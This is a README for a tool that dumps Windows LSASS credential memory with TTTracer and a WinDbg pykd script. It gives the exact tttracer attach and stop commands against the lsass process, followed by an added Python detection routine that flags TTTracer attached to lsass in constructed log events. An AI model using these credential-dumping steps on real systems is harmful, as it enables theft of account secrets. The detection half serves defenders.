PyKDumper3 modified for TTTracer credential dumping
Found this twitter post: https://twitter.com/n_o_t_h_a_n_k_s/status/1559620227586875392
It is an interesting built-in method to dump lsass memory.
Requirements:
- Windows machine
- WinDbg Preview without the Microsoft Store:
  - Paste the Microsoft Store WinDbg link into https://store.rg-adguard.net/ to receive a download link
  - Download the appx file with wget:
    wget -O windbg.appx https://link
  - Double-click the appx file to install it
  Ref: https://digitalitskills.com/windbg-preview-download-and-install-without-ms-store/
Usage:
PowerShell session 1:
tttracer -dumpfull -attach (Get-Process lsass | Select -expand id)
Wait 3-6 seconds.
PowerShell session 2:
tttracer -stop (Get-Process lsass | Select -expand id)
Download pykd and copy pykd.dll to %LocalAppData%\Dbg\EngineExtensions
Open the recorded .run trace file in WinDbg, then run in the WinDbg command window:
.load pykd
!py path_to_script\PyKDumper3_tttracer.py
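From the defender's side, the procedure above leaves a clear trace: a TTTracer.exe process whose command line carries `-attach <pid>` (or `-stop <pid>`) where `<pid>` is the PID of lsass.exe. Because the PowerShell one-liner expands `Get-Process lsass` before TTTracer starts, the TTTracer command line only contains a number, so a detection has to resolve that PID against the lsass.exe process-creation event rather than grep for the string "lsass". The following is an added example (not part of this repository) that does that over a few constructed process-creation events in a simplified, hypothetical log shape; the field names `pid`, `image`, `cmdline` and `parent` are assumptions, not a real Sysmon export.

```python
import re
from typing import Dict, List, Optional, Set

# Constructed sample events in a simplified, hypothetical shape (not a real
# Sysmon/ETW export). Event 2 mirrors "PowerShell session 1" from the README
# after Get-Process has expanded to the lsass PID; event 3 attaches elsewhere.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"pid": "700", "image": r"C:\Windows\System32\lsass.exe",
     "cmdline": r"C:\Windows\system32\lsass.exe",
     "parent": r"C:\Windows\System32\wininit.exe"},
    {"pid": "4120", "image": r"C:\Windows\System32\TTTracer.exe",
     "cmdline": r'"C:\Windows\System32\TTTracer.exe" -dumpfull -attach 700',
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"pid": "4188", "image": r"C:\Windows\System32\TTTracer.exe",
     "cmdline": r'"C:\Windows\System32\TTTracer.exe" -attach 3312',
     "parent": r"C:\Windows\System32\cmd.exe"},
]


def lsass_pids(events: List[Dict[str, str]]) -> Set[str]:
    """Collect the PIDs of every lsass.exe process-creation event."""
    return {e["pid"] for e in events
            if e["image"].lower().endswith("\\lsass.exe")}


def target_pid(cmdline: str) -> Optional[str]:
    """Return the PID passed to -attach or -stop, or None if neither is present."""
    m = re.search(r"(?i)-(?:attach|stop)\s+(\d+)", cmdline)
    return m.group(1) if m else None


def find_tttracer_on_lsass(events: List[Dict[str, str]]) -> List[str]:
    """Return TTTracer command lines whose target PID resolves to lsass.exe.

    Also flags command lines that literally mention lsass, which covers a
    variant where the PID is not pre-expanded by the calling shell.
    """
    targets = lsass_pids(events)
    hits = []
    for e in events:
        if not e["image"].lower().endswith("\\tttracer.exe"):
            continue
        pid = target_pid(e["cmdline"])
        if pid in targets or "lsass" in e["cmdline"].lower():
            hits.append(e["cmdline"])
    return hits


if __name__ == "__main__":
    for hit in find_tttracer_on_lsass(SAMPLE_EVENTS):
        print("TTTracer attached to lsass:", hit)
```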